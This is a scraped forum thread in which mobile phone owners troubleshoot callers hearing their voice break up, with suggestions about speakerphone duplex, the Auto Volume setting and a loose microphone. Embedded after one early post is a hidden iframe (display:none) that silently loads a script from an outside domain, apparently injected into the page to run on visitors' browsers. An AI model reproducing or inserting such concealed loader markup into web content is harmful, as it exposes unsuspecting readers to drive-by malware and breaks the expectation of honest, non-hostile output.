+ Reply to Thread

Voice Breaking up???

I have had several people tell me that my voice keeps breaking up while I talk to them on the phone. I can hear them fine, and have a very strong digital reception. Any thoughts???

And no, I'm not having any sort of voice changes. Puberty or otherwise.
    :BigKnife: :anger

Anybody else having a similar complaint?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    If at first you don't succeed, don't try sky diving.

I talked to Markito on his 7135 earlier today and he soundled like he was on a landline! What was more amazing was that he was indoors behind concrete walls!

Were you using the speakerphone? I thought it was full duplex on the 7135 but that might depend on the carrier or type freqency at the time of the call.
    iPhone therefore iAm.

Same Problem

I'm having the same proble. People say I'm breaking up when I can hear them fine and have a strong digital signal. What gives? I have verizon service in Atlanta.

Just an idea but, maybe the mic is as sensitive as the earpiece whereas it has to be placed just right to work? :conf
    iPhone therefore iAm.

Re: Voice Breaking up???

I have heard a few break ups on my end as well, in a quiet room. I don't know if it has anything to do with enabling "Auto Volume" found in the call volume preferences, but I will place calls today without it and see if that affects matters.
    Originally posted by Steve B.
    I have had several people tell me that my voice keeps breaking up while I talk to them on the phone. I can hear them fine, and have a very strong digital reception. Any thoughts???

Anybody else having a similar complaint?

Re: Re: Voice Breaking up???

Originally posted by Sethster
    I have heard a few break ups on my end as well, in a quiet room. I don't know if it has anything to do with enabling "Auto Volume" found in the call volume preferences, but I will place calls today without it and see if that affects matters.
    Did it seem to make any difference?

Unfortunately my problem is persisting.

I can hear the other person perfectly, but I'm having to repeat myself constantly so that they can hear me.

Another puzzle is that I've never had any trouble with the voice recognition working. My call has gone through the first time every time. So I don't think it's a problem with the mic.

on a 6035 a loose mic sounds like you are "breaking up" on the other end. maybe the same thing here. have you dropped your phone lately?
    act like it then...